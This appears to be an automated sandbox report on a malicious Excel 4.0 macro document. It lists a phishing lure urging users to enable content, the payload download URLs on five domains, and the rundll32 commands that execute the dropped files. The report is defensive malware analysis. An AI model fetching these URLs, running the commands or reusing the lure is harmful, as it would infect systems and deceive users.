
Analysis Report document-933340782.xlsm

Overview

General Information

Sample Name: document-933340782.xlsm
Analysis ID: 383151
MD5: 766f5bb363db9a966b613a42a118798a
SHA1: 57e67742fd7e7fa0badddca5b2cceb4cf09048a7
SHA256: 9952ce93009bb9fe2b687053da8db61f551cd524ca2691669257c35aaba18832

Detection

Hidden Macro 4.0
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2292 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2508 cmdline: rundll32 ..\iekdhfe.dsk,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2340 cmdline: rundll32 ..\iekdhfe.dsk1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2788 cmdline: rundll32 ..\iekdhfe.dsk2,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2792 cmdline: rundll32 ..\iekdhfe.dsk3,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2716 cmdline: rundll32 ..\iekdhfe.dsk4,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://tienda.ventadigital.com.ar/ds/2803.gif | Avira URL Cloud: Label: malware
Source: http://nellaimasthanbiryani.com/ds/2803.gif | Avira URL Cloud: Label: malware
Source: http://thirdstringcalifornia.com/ds/2803.gif | Avira URL Cloud: Label: malware
Source: http://holmesservices.mobiledevsite.co/ds/2803.gif | Avira URL Cloud: Label: malware
Source: http://kristen.sbddev.com/ds/2803.gif | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: holmesservices.mobiledevsite.co | Virustotal: Detection: 7%
Multi AV Scanner detection for submitted file
Source: document-933340782.xlsm | Virustotal: Detection: 37%
Source: document-933340782.xlsm | Metadefender: Detection: 16%
Source: document-933340782.xlsm | ReversingLabs: Detection: 48%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe
Source: global traffic | DNS query: name: kristen.sbddev.com
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 50.23.112.133:80
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 50.23.112.133:80
Source: Joe Sandbox View | IP Address: 143.95.33.96 143.95.33.96
Source: Joe Sandbox View | IP Address: 66.36.231.40 66.36.231.40
Source: global traffic | HTTP traffic detected: GET /ds/2803.gif HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: kristen.sbddev.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: kristen.sbddev.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: kristen.sbddev.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ds/2803.gif HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: tienda.ventadigital.com.ar; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ds/2803.gif HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: thirdstringcalifornia.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ds/2803.gif HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: holmesservices.mobiledevsite.co; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ds/2803.gif HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: nellaimasthanbiryani.com; Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75F3850F.png
Source: global traffic | HTTP traffic detected: GET /ds/2803.gif HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: kristen.sbddev.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: kristen.sbddev.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: kristen.sbddev.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ds/2803.gif HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: tienda.ventadigital.com.ar; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ds/2803.gif HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: thirdstringcalifornia.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ds/2803.gif HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: holmesservices.mobiledevsite.co; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ds/2803.gif HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: nellaimasthanbiryani.com; Connection: Keep-Alive
Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: kristen.sbddev.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 503 Service Unavailable; Connection: Keep-Alive; X-Powered-By: PHP/7.2.34; Content-Type: text/html; charset=UTF-8; Content-Length: 97; Content-Encoding: gzip; Vary: Accept-Encoding; Date: Wed, 07 Apr 2021 08:46:55 GMT; Server: LiteSpeed; Data Raw: 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b d1 b3 d1 cf 30 b4 0b c9 48 55 28 4a 2d 2c 4d 2d 2e 49 4d 51 08 0d f2 51 d0 4f 29 d6 37 b2 30 30 d6 4b cf 4c 53 28 4f 2c 56 c8 cb 2f 51 48 03 e9 50 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 03 00 8c 1f 10 3a 4f 00 00 00; Data Ascii: 0/Qp/K0HU(J-,M-.IMQQO)700KLS(O,V/QHPS(,V(N-*K-:O
Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000008.00000002.2100437884.0000000001B90000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing 11 from the yellow bar above 12 :: Once You have Enable Editing, please ell r, i m
Source: Screenshot number: 8 | Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please click Enab
Source: Screenshot number: 8 | Screenshot OCR: Enable Content 14 from the yellow bar above 15 16 17 18 WHY I CANNOTOPEN THIS DOCUMENT? 19 2
Source: Document image extraction number: 9 | Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9 | Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Screenshot number: 12 | Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 12 | Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Found Excel 4.0 Macro with suspicious formulas
Source: document-933340782.xlsm | Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: document-933340782.xlsm | Initial sample: Sheet size: 53161
Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal88.expl.evad.winXLSM@11/12@5/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$document-933340782.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRCB2B.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk,DllRegisterServer
Source: document-933340782.xlsm | Virustotal: Detection: 37%
Source: document-933340782.xlsm | Metadefender: Detection: 16%
Source: document-933340782.xlsm | ReversingLabs: Detection: 48%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk3,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk4,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk3,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk4,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe | Automated click: OK
Source: C:\Windows\System32\rundll32.exe | Automated click: OK
Source: C:\Windows\System32\rundll32.exe | Automated click: OK
Source: C:\Windows\System32\rundll32.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: document-933340782.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: document-933340782.xlsm | Initial sample: OLE zip file path = xl/media/image4.png
Source: document-933340782.xlsm | Initial sample: OLE zip file path = xl/media/image3.png
Source: document-933340782.xlsm | Initial sample: OLE zip file path = xl/media/image1.png
Source: document-933340782.xlsm | Initial sample: OLE zip file path = xl/media/image2.png
Source: document-933340782.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: document-933340782.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (26 identical entries)
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX (5 identical entries)

Mitre Att&ck Matrix

Techniques are listed per tactic column; a number in parentheses is the superscript count of matched signatures shown in the original matrix.

  • Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
  • Execution: Scripting (2), Exploitation for Client Execution (23), At (Linux), At (Windows), Cron
  • Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
  • Privilege Escalation: Process Injection (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
  • Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Rundll32 (1), Process Injection (1), Scripting (2)
  • Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
  • Discovery: File and Directory Discovery (1), System Information Discovery (2), Query Registry, System Network Configuration Discovery, Remote System Discovery
  • Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
  • Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging
  • Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits
  • Command and Control: Non-Application Layer Protocol (3), Application Layer Protocol (13), Ingress Tool Transfer (4), Protocol Impersonation, Fallback Channels
  • Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication
  • Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
  • Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings

Behavior Graph


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
document-933340782.xlsm | 37% | Virustotal | -
document-933340782.xlsm | 19% | Metadefender | -
document-933340782.xlsm | 48% | ReversingLabs | Document-Excel.Spyware.Ymacco

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
kristen.sbddev.com | 2% | Virustotal | -
holmesservices.mobiledevsite.co | 7% | Virustotal | -
tienda.ventadigital.com.ar | 4% | Virustotal | -
nellaimasthanbiryani.com | 4% | Virustotal | -

URLs

Source | Detection | Scanner | Label
http://tienda.ventadigital.com.ar/ds/2803.gif | 100% | Avira URL Cloud | malware
http://nellaimasthanbiryani.com/ds/2803.gif | 100% | Avira URL Cloud | malware
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://thirdstringcalifornia.com/ds/2803.gif | 100% | Avira URL Cloud | malware
http://holmesservices.mobiledevsite.co/ds/2803.gif | 100% | Avira URL Cloud | malware
http://kristen.sbddev.com/cgi-sys/suspendedpage.cgi | 0% | Avira URL Cloud | safe
http://kristen.sbddev.com/ds/2803.gif | 100% | Avira URL Cloud | malware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
kristen.sbddev.com | 50.23.112.133 | true | false | - | unknown
holmesservices.mobiledevsite.co | 103.68.166.129 | true | true | - | unknown
tienda.ventadigital.com.ar | 31.170.166.139 | true | false | - | unknown
nellaimasthanbiryani.com | 66.36.231.40 | true | false | - | unknown
thirdstringcalifornia.com | 143.95.33.96 | true | false | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://tienda.ventadigital.com.ar/ds/2803.gif | true | Avira URL Cloud: malware | unknown
http://nellaimasthanbiryani.com/ds/2803.gif | true | Avira URL Cloud: malware | unknown
http://thirdstringcalifornia.com/ds/2803.gif | true | Avira URL Cloud: malware | unknown
http://holmesservices.mobiledevsite.co/ds/2803.gif | true | Avira URL Cloud: malware | unknown
http://kristen.sbddev.com/cgi-sys/suspendedpage.cgi | false | Avira URL Cloud: safe | unknown
http://kristen.sbddev.com/ds/2803.gif | true | Avira URL Cloud: malware | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmp | false | - | high
http://www.windows.com/pctv. | rundll32.exe, 00000008.00000002.2100437884.0000000001B90000.00000002.00000001.sdmp | false | - | high
http://investor.msn.com | rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp | false | - | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp | false | - | high
http://www.icra.org/vocabulary/. | rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://investor.msn.com/ | rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp | false | - | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp | false | - | high

                Contacted IPs

                Public

IP               Domain                            Country         ASN     ASN Name                                      Malicious
143.95.33.96     thirdstringcalifornia.com         United States   62729   ASMALLORANGE1US                               false
66.36.231.40     nellaimasthanbiryani.com          United States   14361   HOPONE-GLOBALUS                               false
50.23.112.133    kristen.sbddev.com                United States   36351   SOFTLAYERUS                                   false
31.170.166.139   tienda.ventadigital.com.ar        United States   47583   AS-HOSTINGERLT                                false
103.68.166.129   holmesservices.mobiledevsite.co   Singapore       38719   DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU   true

